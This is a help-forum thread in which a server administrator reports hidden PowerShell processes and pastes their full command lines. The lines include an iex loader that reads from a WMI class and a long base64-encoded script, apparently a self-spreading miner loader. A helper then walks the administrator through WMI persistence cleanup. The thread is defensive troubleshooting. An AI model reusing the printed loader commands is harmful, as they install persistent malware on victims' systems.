Jump to content
Malzuko

Powershell running hidden script consuming 70% of cpu

Recommended Posts

Hello

I have been having an issue with our server at work recently and cant get to the bottom of it. Two Powershell windows keep opening in the background running a script one of which consuming a lot of CPU power. I can end the task or suspend the process but it always returns.

This machine hosts a domain and several users log into this server via remote desktop on the default port 3389

 

These are the scrips  - the first one is the one using 70% of the CPU

- the second one always appears first

 

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

 

powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUAIAAgACAAIAAgACAAIAAgAA0ACgAkAGQAZQBmAHUAbgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZgB1AG4AcwApACkADQAKAGkAZQB4ACAAJABkAGUAZgB1AG4ADQAKAA0ACgBHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAXwBfAEYAaQBsAHQAZQByAFQAbwBDAG8AbgBzAHUAbQBlAHIAQgBpAG4AZABpAG4AZwAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGYAaQBsAHQAZQByACAALQBuAG8AdABtAGEAdABjAGgAIAAnAFMAQwBNACAARQB2AGUAbgB0ACAATABvAGcAcwAnAH0AIAB8AFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQADQAKACQAZABpAHIAcABhAHQAaAA9ACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACsAJwBcAHMAeQBzAHQAZQBtADMAMgAnACAAIAAgAA0ACgBpAGYAIAAgACgAIQAoAHQAZQBzAHQALQBwAGEAdABoACAAJABkAGkAcgBwAGEAdABoACAAKQApAHsADQAKAAkAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQADQAKAH0ADQAKAGkAZgAgACgAIQAoAHQAZQBzAHQALQBwAGEAdABoACAAKAAkAGQAaQByAHAAYQB0AGgAKwAnAFwAbQBzAHYAYwBwADEAMgAwAC4AZABsAGwAJwApACkAKQANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADUANQAiACkALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA3ADcANwA3ACIAKQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABlAHYAaQBkAD0AJABsAGkAbgBlAFsALQAxAF0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AaQBkACAAJABlAHYAaQBkACAAfAAgAHMAdABvAHAALQBwAHIAbwBjAGUAcwBzACAALQBmAG8AcgBjAGUADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAGkAZgAgACgAIQAkAGUAeABpAHMAdAAgAC0AYQBuAGQAIAAoACQAcABzAGkAZABzAC4AYwBvAHUAbgB0ACAALQBsAGUAIAA4ACkAKQANAAoAewAgACAAIAANAAoAIAAgACAAIAAkAGMAbQBkAG0AbwBuAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBOAG8AUAAgAC0ATgBvAG4ASQAgAC0AVwAgAEgAaQBkAGQAZQBuACAAYAAiAGAAJABtAG8AbgAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoATwBmAGYAaQBjAGUAXwBVAHAAZABhAHQAZQByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AbwBuACcAXQAuAFYAYQBsAHUAZQA7AGAAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUAIAA7AGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABgACQAZgB1AG4AcwApACkAKQA7AEkAbgB2AG8AawBlAC0AQwBvAG0AbQBhAG4AZAAgACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIABgACQAUgBlAG0AbwB0AGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAEAAKABgACQAbQBvAG4ALAAgAGAAJABtAG8AbgAsACAAJwBWAG8AaQBkACcALAAgADAALAAgACcAJwAsACAAJwAnACkAYAAiACIADQAKACAAIAAgACAAJAB2AGIAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwADQAKAAkAJAB2AGIAcwAuAHIAdQBuACgAJABjAG0AZABtAG8AbgAsADAAKQAgACAADQAKAH0ADQAKAA0ACgAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAJABtAGkAbQBpACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBpAG0AaQAnAF0ALgBWAGEAbAB1AGUAIAANAAoAJABhACwAIAAkAE4AVABMAE0APQAgAEcAZQB0AC0AYwByAGUAZABzACAAJABtAGkAbQBpACAAJABtAGkAbQBpAA0ACgAgACAAIAAgACAAIAAgAA0ACgAkAE4AZQB0AHcAbwByAGsAcwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATgBlAHQAdwBvAHIAawBBAGQAYQBwAHQAZQByAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AIAAtAEUAQQAgAFMAdABvAHAAIAB8ACAAPwAgAHsAJABfAC4ASQBQAEUAbgBhAGIAbABlAGQAfQAgACAAIAAgAA0ACgAkAGkAcABzAHUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AE8AZgBmAGkAYwBlAF8AVQBwAGQAYQB0AGUAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpAHAAcwB1ACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGkAMQA3ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQAxADcAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAcwBjACcAXQAuAFYAYQBsAHUAZQANAAoAWwBiAHkAdABlAFsAXQBdACQAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBjAGIAYQApACAAIAAgACAAIAANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABOAGUAdAB3AG8AcgBrACAAaQBuACAAJABOAGUAdAB3AG8AcgBrAHMAKQAgAA0ACgB7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgAA0ACgAgACAAIAAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAHAAQQBkAGQAcgBlAHMAcwBbADAAXQAgACAADQAKAAkAaQBmACAAKAAkAEkAUABBAGQAZAByAGUAcwBzACAALQBtAGEAdABjAGgAIAAnAF4AMQA2ADkALgAyADUANAAnACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgAAkADQAKACAAIAAgACAAJABTAHUAYgBuAGUAdABNAGEAcwBrACAAIAA9ACAAJABOAGUAdAB3AG8AcgBrAC4ASQBQAFMAdQBiAG4AZQB0AFsAMABdACAAIAANAAoAIAAgACAAIAAkAGkAcABzAD0ARwBlAHQALQBOAGUAdAB3AG8AcgBrAFIAYQBuAGcAZQAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsADQAKAAkAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAAgAA0ACgAJAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoACQAJAGkAZgAgACgAJABsAGkAbgBlAC4AYwBvAHUAbgB0ACAALQBsAGUAIAA0ACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoACQAJACQAaQA9ACQAbABpAG4AZQBbAC0AMwBdAC4AcwBwAGwAaQB0ACgAJwA6ACcAKQBbADAAXQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIAAoACQAbABpAG4AZQBbAC0AMgBdACAALQBlAHEAIAAnAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAnACkAIAAtAGEAbgBkACAAIAAoACQAaQAgAC0AbgBlACAAJwAxADIANwAuADAALgAwAC4AMQAnACkAIAAtAGEAbgBkACAAKAAkAGkAcABzACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAKQApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABpAHAAcwArAD0AJABpAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGkAZgAgACgAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAAtACQAcwB0AGkAbQBlACkALwAxADAAMAAwACAALQBnAHQAIAA1ADQAMAAwACkAewBiAHIAZQBhAGsAfQANAAoACQAkAHMAZQA9AEAAKAAnADEAMAA3AC4AMQA3ADkALgA2ADcALgAyADQAMwAnACwAJwAxADcAMgAuADIANAA3AC4AMQAxADYALgA4ACcAKQANAAoACQAkAG4AaQBjAD0AJwAxADEAOAAuADEAOAA0AC4ANAA4AC4AOQA1ACcADQAKAAkAZgBvAHIAZQBhAGMAaAAoACQAdAAgAGkAbgAgACQAcwBlACkADQAKAAkAewANAAoACQAJACQAcABpAG4APQB0AGUAcwB0AC0AYwBvAG4AbgBlAGMAdABpAG8AbgAgACQAdAANAAoACQAJAGkAZgAgACgAJABwAGkAbgAgAC0AbgBlACAAJABuAHUAbABsACkADQAKAAkACQB7AA0ACgAJAAkACQAkAG4AaQBjAD0AJAB0AA0ACgAJAAkACQBiAHIAZQBhAGsADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAJABuAGkAYwA9ACQAbgBpAGMAKwAiADoAOAAwADAAMAAiAA0ACgANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAGkAcAAgAGkAbgAgACQAaQBwAHMAKQANAAoAIAAgACAAIAB7ACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGkAcAAgAC0AZQBxACAAJABJAFAAQQBkAGQAcgBlAHMAcwApAHsAYwBvAG4AdABpAG4AdQBlAH0AIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoAFQAZQBzAHQALQBDAG8AbgBuAGUAYwB0AGkAbwBuACAAJABpAHAAIAAtAGMAbwB1AG4AdAAgADEAKQAgAC0AbgBlACAAJABuAHUAbABsACAAIAAtAGEAbgBkACAAJABpAHAAcwB1ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApACAADQAKACAAIAAgACAAIAAgACAAIAB7ACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHIAZQA9ADAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABhAC4AYwBvAHUAbgB0ACAALQBuAGUAIAAwACkAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsAJAByAGUAIAA9ACAAdABlAHMAdAAtAGkAcAAgAC0AaQBwACAAJABpAHAAIAAtAGMAcgBlAGQAcwAgACQAYQAgACAALQBuAGkAYwAgACQAbgBpAGMAIAAtAG4AdABsAG0AIAAkAE4AVABMAE0AIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAcgBlACAALQBlAHEAIAAxACkAewAkAGkAcABzAHUAIAA9ACQAaQBwAHMAdQAgACsAIgAgACIAKwAkAGkAcAB9AA0ACgAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAdgB1AGwAPQBbAFAAaQBuAGcAQwBhAHMAdABsAGUALgBTAGMAYQBuAG4AZQByAHMALgBtADEANwBzAGMAXQA6ADoAUwBjAGEAbgAoACQAaQBwACkACQAJAAkACQANAAoACQAJAAkACQBpAGYAIAAoACQAdgB1AGwAIAAtAGEAbgBkACAAJABpADEANwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==

 

 

Addition.txt

FRST.txt

mb.txt

AdwCleaner[S1].txt

MyConsoleSettings.txt

MyScheduledTasks.txt

Share this post


Link to post
Share on other sites

Hi Malzuko :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.

  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on Malwarebytes Forums, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against Malwarebytes Forums's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread


This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Read the following:

https://forum.eset.com/topic/14143-powershell-script-100-cpu-load-malicious-attack/

Long story short, your server (and your network) have been compromised.

Did you delete the scheduled tasks that were launching these PowerShell scripts?

Share this post


Link to post
Share on other sites

I ran these scripts as instructed about a week ago:

 

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Filter'" |remOVe-WMIObject  -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM Event Consumer'" | Remove-WMIObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%SCM Event Consumer%'" | REmOVE-WMIObject -Verbose
([WmiClass]'root\default:Win32_TaskService') | Remove-WMIObject -Verbose

Get-WMIObject -Namespace root\Subscription -Class  ActiveScriptEventConsumer -Filter "Name='SCM Event Consumer'" | Remove-WMIObject -Verbose

 

I ran them again today the 3rd one comes back red but all the others return the the normal prompt - I believe when I ran them the first time, the first 2 commands returned with returned with yellow text

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Fil
ter'" |remOVe-WMIObject  -Verbose
PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM
 Event Consumer'" | Remove-WMIObject -Verbose
PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path L
IKE '%SCM Event Consumer%'" | REmOVE-WMIObject -Verbose
PS C:\Users\Administrator> ([WmiClass]'root\default:Win32_TaskService') | Remove-WMIObject -Verbose
Cannot convert value "root\default:Win32_TaskService" to type "System.Management.ManagementClass". Error: "Not found "
At line:1 char:1
+ ([WmiClass]'root\default:Win32_TaskService') | Remove-WMIObject -Verbose

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvalidCastToWMIClass

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class  ActiveScriptEventConsumer -Filter "Name='S
CM Event Consumer'" | Remove-WMIObject -Verbose
PS C:\Users\Administrator>

 

 - I also ran WMILister_23 - thru the process of doing that after a few screens it just kept saying possible embedded exe [ok]

  - I probably pushed [ok] 100 times - I ended up ending the task

 

 

DumptedScripts.txt

Share this post


Link to post
Share on other sites

Can you try this command instead?

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose

This one should go through.

Share this post


Link to post
Share on other sites

No luck with that. I tried it when it was running and when I have ended the take on it.

This was the response running an administrator powershell:

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs
 Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose
Remove-WMIObject : The input object cannot be bound to any parameters for the command either because the command does
not take pipeline input or the input and its properties do not match any of the parameters that take pipeline input.
At line:1 char:106
+ ... ogs Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Office_Update ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (\\WIN-K9REC7QI4...nt Logs Filter":PSObject) [Remove-WmiObject], Parame
   terBindingException
    + FullyQualifiedErrorId : InputObjectNotBound,Microsoft.PowerShell.Commands.RemoveWmiObject

PS C:\Users\Administrator>

Share this post


Link to post
Share on other sites

Try this, I think the way it was copy/pasted added too many spaces.

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs Filter'" | Remove-WMIObject -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose

 

Share this post


Link to post
Share on other sites

Still no luck,  does it matter if the script if running? because I have ended it for the till it appears again

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs
 Filter'" | Remove-WMIObject -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose
Remove-WMIObject : The input object cannot be bound to any parameters for the command either because the command does
not take pipeline input or the input and its properties do not match any of the parameters that take pipeline input.
At line:1 char:106
+ ... ogs Filter'" | Remove-WMIObject -Verbose ([WmiClass]'root\default:Office_Updater ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (\\WIN-K9REC7QI4...nt Logs Filter":PSObject) [Remove-WmiObject], Parame
   terBindingException
    + FullyQualifiedErrorId : InputObjectNotBound,Microsoft.PowerShell.Commands.RemoveWmiObject

PS C:\Users\Administrator>

Share this post


Link to post
Share on other sites

Yoan,

Fisrt I would like to thank you for your help so, it has been encouraging :)

Ive been poking around in Sysinternals and discovered some more information that may or may not help.

A lot of the scheduled task entries and the powershell entry share the same 10/28/2014 timestamp

Are these the scheduled tasks I need to delete ?

 

 

screenshot1.thumb.jpg.1cd883cf57510736fd94570fc787818b.jpgscreenshot2.thumb.jpg.4e47faca2e2ee20b2e58b4a4cf0c0b04.jpg

 

Share this post


Link to post
Share on other sites

